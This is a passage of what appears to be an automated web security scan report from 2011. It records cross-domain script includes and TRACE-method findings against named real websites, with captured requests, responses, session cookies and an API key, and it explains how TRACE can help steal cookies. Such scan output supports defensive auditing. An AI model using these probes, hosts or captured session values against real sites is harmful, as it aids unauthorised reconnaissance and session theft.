GET /markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/ HTTP/1.1
Host: www.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-FoxNews-EdgeTTL: 5m
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=240
Date: Thu, 12 May 2011 11:37:53 GMT
Connection: close
Content-Length: 66439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoc
...[SNIP]...
</script>

<script src="http://ads.foxnews.com/js/ad.js"></script>
...[SNIP]...

20.33. http://www.gobignetwork.com/funding previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gobignetwork.com
Path:	/funding

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

Response

20.34. http://www.korteco.com/live-project previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.korteco.com
Path:	/live-project

Issue detail

The response dynamically includes the following script from another domain:

http://maps.google.com/maps?file=api&v=2.115&key=ABQIAAAAN3OhYUYVAE5sUttuXebjOBQRyETACf-kbMYmEl0n_VqOZ4dc_xRFVoMOBnh8vPZ34ZxZKVgwCP0JEA&hl=en

Request

GET /live-project HTTP/1.1
Host: www.korteco.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.korteco.com/
Cookie: SESS31e5fbde7def436979bdb9291b5781da=0evqcgbv3nlct72jq5nho296j5; has_js=1; __utma=91397376.1526762305.1305205892.1305205892.1305205892.1; __utmb=91397376.1.10.1305205892; __utmc=91397376; __utmz=91397376.1305205892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:11:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Thu, 12 May 2011 13:11:51 GMT
ETag: "1cae53c427fe4cd2eed31261561f8ac8"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script src="http://maps.google.com/maps?file=api&v=2.115&key=ABQIAAAAN3OhYUYVAE5sUttuXebjOBQRyETACf-kbMYmEl0n_VqOZ4dc_xRFVoMOBnh8vPZ34ZxZKVgwCP0JEA&hl=en" type="text/javascript"></script>
...[SNIP]...

20.35. http://www.mimecast.com/About-us/Contact-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/About-us/Contact-us/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js

Request

Response

20.36. http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mimecast.com
Path:	/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/buttons.js

Request

GET /News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/ HTTP/1.1
Host: www.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/
Cookie: ASP.NET_SessionId=jog5wjepoenulrevfy0j33fx; MimecastcomTracker=id=1762893; MimecastcomRegion=North America; __utma=147046443.160771080.1305203710.1305203710.1305203710.1; __utmb=147046443.4.10.1305203710; __utmc=147046443; __utmz=147046443.1305203710.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 11 May 2011 12:39:26 GMT
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:39:26 GMT
Content-Length: 29960

...

<!DOCTYPE HTML>
<html>
<head id="ctl00_ctl00_Head1"><meta charset="utf-8" /><title>Mimecast</title>

<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewpor
...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.37. http://www.pomerantzlaw.com/attorneys.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/attorneys.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /attorneys.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/contact-us.html
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.2.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 12120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.38. http://www.pomerantzlaw.com/cases.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/cases.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

20.39. http://www.pomerantzlaw.com/contact-us.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/contact-us.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /contact-us.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.1.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 10359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.40. http://www.pomerantzlaw.com/practice-areas.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/practice-areas.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /practice-areas.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html?action=attorneyDetail&attorneyID=15
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.7.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:00:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 8281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.41. http://www.pomerantzlaw.com/the-firm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pomerantzlaw.com
Path:	/the-firm.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /the-firm.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/attorneys.html?action=attorneyDetail&attorneyID=15
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.6.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:00:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 7957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...

20.42. http://www.privateequityinfo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

20.43. http://www.privateequityinfo.com/forgotpassword.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/forgotpassword.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

20.44. http://www.privateequityinfo.com/product_details.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/product_details.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

20.45. http://www.providenceequitypartners.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.providenceequitypartners.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.provequity.com/swfobject.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13788
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASAQTRCB=CAMHPCLDELCDGHFEIMOCJHMO; path=/
Cache-control: private

<html>
<head>
   <title>Providence Equity Partners LLC</title>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
   <link href="http://www.provequity.com/styles.css" rel=
...[SNIP]...
<link rel="shortcut icon" href="http://www.provequity.com/favicon.ico" />
   <script type="text/javascript" src="http://www.provequity.com/swfobject.js"></script>
...[SNIP]...

20.46. http://www.soundpatheview.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundpatheview.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.conferenceservers.com/browser/proxy.asp

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:02 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
</script>
<script src="http://www.conferenceservers.com/browser/proxy.asp" type="text/javascript"></script>
...[SNIP]...

20.47. http://www.vcgate.com/Private-Equity.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcgate.com
Path:	/Private-Equity.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.affiliaterunner.com/Merchant/JScripts/Redirect.js

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-type: text/html
Content-Length: 13102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>



<script language="javascript" SRC="http://www.affiliaterunner.com/Merchant/JScripts/Redirect.js">
</script>
...[SNIP]...

20.48. http://www.vcgate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcgate.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://www.affiliaterunner.com/Merchant/JScripts/Redirect.js

Request

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<meta name="generator" content="WordPress 2.7.1" />

<script language="javascript" SRC="http://www.affiliaterunner.com/Merchant/JScripts/Redirect.js">
</script>
...[SNIP]...

20.49. http://www.vcprodatabase.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcprodatabase.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET / HTTP/1.1
Host: www.vcprodatabase.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 22208
Content-Type: text/html
Content-Location: http://www.vcprodatabase.com/index.htm
Last-Modified: Fri, 15 Apr 2011 02:22:54 GMT
Accept-Ranges: bytes
ETag: "5ebc26714fbcb1:5897"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:02:25 GMT

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="Description" content="VCPro Database is a downloadable venture capital and private equity dire
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d7f64ca6906e72b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d7f64ca6906e72b"></script>
...[SNIP]...

20.50. http://www.vcprodatabase.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcprodatabase.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /favicon.ico HTTP/1.1
Host: www.vcprodatabase.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Length: 8251
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:02:32 GMT

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="robots" content="noindex, nofollow">
<link REL="stylesheet" TYPE="text/css" HREF="../style/co
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d7f64ca6906e72b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d7f64ca6906e72b"></script>
...[SNIP]...

21. TRACE method is enabled previous next
There are 13 instances of this issue:

http://convctr.overture.com/
http://investmentfirmsdirect.com/
http://media.ft.com/
http://secure-us.imrworldwide.com/
http://stats.ft.com/
http://webezines.kwithost.com/
http://www.bergerkahn.com/
http://www.butlerrubin.com/
http://www.dmoc.com/
http://www.hbsr.com/
http://www.opalgroup.net/
http://www.privateequityinfo.com/
http://www.tuckerellis.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

21.1. http://convctr.overture.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://convctr.overture.com
Path:	/

Request

TRACE / HTTP/1.0
Host: convctr.overture.com
Cookie: c81679cb27cd65ce

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:25 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: c81679cb27cd65ce
Host: convctr.overture.com

21.2. http://investmentfirmsdirect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://investmentfirmsdirect.com
Path:	/

Request

TRACE / HTTP/1.0
Host: investmentfirmsdirect.com
Cookie: 5e4c3aa7b3557395

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:30 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: investmentfirmsdirect.com
Cookie: 5e4c3aa7b3557395

21.3. http://media.ft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.ft.com
Path:	/

Request

TRACE / HTTP/1.0
Host: media.ft.com
Cookie: 8f98f54ca90f3353

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Thu, 12 May 2011 11:03:18 GMT
Content-Type: message/http
Content-Length: 99
Expires: Thu, 12 May 2011 11:03:18 GMT
Connection: close

TRACE / HTTP/1.0
Host: media.ft.com
Cookie: 8f98f54ca90f3353
_FP_X_URL: http://media.ft.com/

21.4. http://secure-us.imrworldwide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: d2df793dedba7a7d

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: d2df793dedba7a7d
Host: secure-us.imrworldwide.com

21.5. http://stats.ft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stats.ft.com
Path:	/

Request

TRACE / HTTP/1.0
Host: stats.ft.com
Cookie: 3bd0b215e2ccac8

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:34 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: stats.ft.com
Cookie: 3bd0b215e2ccac8

21.6. http://webezines.kwithost.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webezines.kwithost.com
Path:	/

Request

TRACE / HTTP/1.0
Host: webezines.kwithost.com
Cookie: c41bd4f931f805a8

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Apache/2.2.16 (Amazon)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: webezines.kwithost.com
Cookie: c41bd4f931f805a8

21.7. http://www.bergerkahn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bergerkahn.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.bergerkahn.com
Cookie: 197885c4921638c0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:19:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bergerkahn.com
Cookie: 197885c4921638c0

21.8. http://www.butlerrubin.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.butlerrubin.com
Cookie: 8182bb866165f2b

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:18 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 12 May 2011 12:21:18 GMT
Content-Type: message/http
Content-Length: 70

TRACE / HTTP/1.0
Host: www.butlerrubin.com
Cookie: 8182bb866165f2b

21.9. http://www.dmoc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmoc.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.dmoc.com
Cookie: 71fffb2bce45600f

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:19:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dmoc.com
Cookie: 71fffb2bce45600f

21.10. http://www.hbsr.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.hbsr.com
Cookie: bc55d55072b1fa4a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:28 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.hbsr.com
Cookie: bc55d55072b1fa4a

21.11. http://www.opalgroup.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.opalgroup.net
Path:	/

Request

TRACE / HTTP/1.0
Host: www.opalgroup.net
Cookie: 1ff9e3319e03cdd

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:01:14 GMT
Server: Apache/2.2.6 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.opalgroup.net
Cookie: 1ff9e3319e03cdd

21.12. http://www.privateequityinfo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.privateequityinfo.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.privateequityinfo.com
Cookie: be16e65b9cb86c03

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.privateequityinfo.com
Cookie: be16e65b9cb86c03

21.13. http://www.tuckerellis.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tuckerellis.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.tuckerellis.com
Cookie: d537795292ad6dbf

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:41 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tuckerellis.com
Cookie: d537795292ad6dbf

22. Email addresses disclosed previous next
There are 89 instances of this issue:

http://ads.adbrite.com/adserver/vdi/742697
http://ads.foxnews.com/js/omtr_code.js
https://ams-legal.net/support/Login.asp
http://axley.com/
http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.en.4-6-15-45512.json
http://dealbook.nytimes.com/
http://dealbook.nytimes.com/2011/05/03/cerberus-and-partner-acquire-innkeepers-hotels/
http://dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/
http://dealbook.nytimes.com/2011/05/03/onex-sells-husky-international-for-2-1-billion/
http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
http://dealbook.nytimes.com/2011/05/06/how-well-did-warner-musics-investors-do/
http://dealbook.nytimes.com/2011/05/06/palantir-valued-at-2-5-billion-or-more/
http://dealbook.nytimes.com/2011/05/09/linkedin-on-track-to-raise-274-million-with-ipo/
http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
http://dealbook.nytimes.com/2011/05/10/apollo-to-buy-out-american-idol-owner/
http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/
http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
http://dealbook.nytimes.com/category/main-topics/private-equity/
http://dealbook.nytimes.com/category/main-topics/venture-capital/
http://digiware.com/contact.htm
http://digiware.com/privacy.htm
http://honey.digiware.net/
